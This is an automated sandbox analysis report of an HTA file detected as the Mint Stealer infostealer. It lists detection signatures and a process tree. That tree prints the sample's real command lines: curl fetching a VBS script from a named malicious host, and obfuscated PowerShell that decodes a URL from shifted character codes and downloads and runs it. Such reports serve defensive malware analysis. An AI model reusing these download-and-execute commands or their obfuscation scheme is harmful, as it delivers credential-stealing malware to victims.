Edit tour
Windows
Analysis Report
PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
Overview
General Information
Sample name: | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htarenamed because original name is a hash value |
Original sample name: | PKO_0019868519477_PDF_.hta |
Analysis ID: | 1576834 |
MD5: | 8da85c61d9b033c0c6b99452a4d66976 |
SHA1: | bf2e95e2c7d9e3690fcb323daefaba311021cea6 |
SHA256: | 0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc |
Tags: | htauser-cdcd |
Infos: | |
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- mshta.exe (PID: 7356 cmdline:
mshta.exe "C:\Users\ user\Deskt op\PKO_001 9868519477 _PDF_#U246 2#U2465#U2 461#U2465# U2467#U246 4#U2464#U2 466.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 7588 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\676198 543e2f3.vb s https:// pko-downlo ad.kagyout h.co.ke/67 6198543e20 a/67619854 3e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7640 cmdline:
curl -k -o C:\Users\ Public\676 198543e2f3 .vbs https ://pko-dow nload.kagy outh.co.ke /676198543 e20a/67619 8543e2f3.v bs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 7736 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76198543e2 f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7808 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676198543 e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - wscript.exe (PID: 8128 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\r iodfc.js MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 7828 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76198543e2 f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7916 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676198543 e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - wscript.exe (PID: 8176 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\p mxdhq.js MD5: FF00E0480075B095948000BDC66E81F0) - conhost.exe (PID: 6828 cmdline:
conhost -- headless p owershell $qlsaitfog cdk='ur' ; new-alias printout c $($qlsaitf ogcdk)l;$b xcsrwklu=( 9122,9134, 9130,9134, 9129,9136, 9117,9075, 9141,9122, 9070,9065, 9135,9130, 9131,9066, 9068,9065, 9131,9123, 9131,9082, 9134,9080, 9128,9124, 9129,9135, 9134,9069, 9068);$qat enrdzxhfi= ('bronx',' get-cmdlet ');$hepltz uk=$bxcsrw klu;foreac h($vhrpuks ybcwal in $hepltzuk) {$rtqbhnze jclomf=$vh rpuksybcwa l;$lsazfhg enmk=$lsaz fhgenmk+[c har]($rtqb hnzejclomf -9019);$zm sflnojqgtd =$lsazfhge nmk; $majk lvetzswhbp =$zmsflnoj qgtd};$ydr zolhea[2]= $majklvetz swhbp;$ruy hial='rl'; $udsqxtw=1 ;.$([char] (9992-9887 )+'e'+'x') (printout -useb $maj klvetzswhb p) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2800 cmdline:
powershell $qlsaitfo gcdk='ur' ;new-alias printout c$($qlsait fogcdk)l;$ bxcsrwklu= (9122,9134 ,9130,9134 ,9129,9136 ,9117,9075 ,9141,9122 ,9070,9065 ,9135,9130 ,9131,9066 ,9068,9065 ,9131,9123 ,9131,9082 ,9134,9080 ,9128,9124 ,9129,9135 ,9134,9069 ,9068);$qa tenrdzxhfi =('bronx', 'get-cmdle t');$heplt zuk=$bxcsr wklu;forea ch($vhrpuk sybcwal in $hepltzuk ){$rtqbhnz ejclomf=$v hrpuksybcw al;$lsazfh genmk=$lsa zfhgenmk+[ char]($rtq bhnzejclom f-9019);$z msflnojqgt d=$lsazfhg enmk; $maj klvetzswhb p=$zmsflno jqgtd};$yd rzolhea[2] =$majklvet zswhbp;$ru yhial='rl' ;$udsqxtw= 1;.$([char ](9992-988 7)+'e'+'x' )(printout -useb $ma jklvetzswh bp) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5224 cmdline:
conhost -- headless p owershell $wesvdclpa g='ur' ;ne w-alias pr intout c$( $wesvdclpa g)l;$kiubx j=(8009,80 21,8017,80 21,8016,80 23,8004,79 62,8028,80 09,7957,79 52,8022,80 17,8018,79 53,7955,79 52,8018,80 10,8018,79 69,8021,79 67,8015,80 11,8016,80 22,8021,79 56,7955);$ yhgausrze= ('bronx',' get-cmdlet ');$ibaoen pfqcwds=$k iubxj;fore ach($capbm dvq in $ib aoenpfqcwd s){$islyzg jwhrxt=$ca pbmdvq;$al hsoibwvkj= $alhsoibwv kj+[char]( $islyzgjwh rxt-7906); $lkzfxe=$a lhsoibwvkj ; $wrbziek v=$lkzfxe} ;$mxhfwdcn uibzy[2]=$ wrbziekv;$ owqrhjdva= 'rl';$jpki zcrmv=1;.$ ([char](99 92-9887)+' e'+'x')(pr intout -us eb $wrbzie kv) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3448 cmdline:
powershell $wesvdclp ag='ur' ;n ew-alias p rintout c$ ($wesvdclp ag)l;$kiub xj=(8009,8 021,8017,8 021,8016,8 023,8004,7 962,8028,8 009,7957,7 952,8022,8 017,8018,7 953,7955,7 952,8018,8 010,8018,7 969,8021,7 967,8015,8 011,8016,8 022,8021,7 956,7955); $yhgausrze =('bronx', 'get-cmdle t');$ibaoe npfqcwds=$ kiubxj;for each($capb mdvq in $i baoenpfqcw ds){$islyz gjwhrxt=$c apbmdvq;$a lhsoibwvkj =$alhsoibw vkj+[char] ($islyzgjw hrxt-7906) ;$lkzfxe=$ alhsoibwvk j; $wrbzie kv=$lkzfxe };$mxhfwdc nuibzy[2]= $wrbziekv; $owqrhjdva ='rl';$jpk izcrmv=1;. $([char](9 992-9887)+ 'e'+'x')(p rintout -u seb $wrbzi ekv) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary |
---|
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |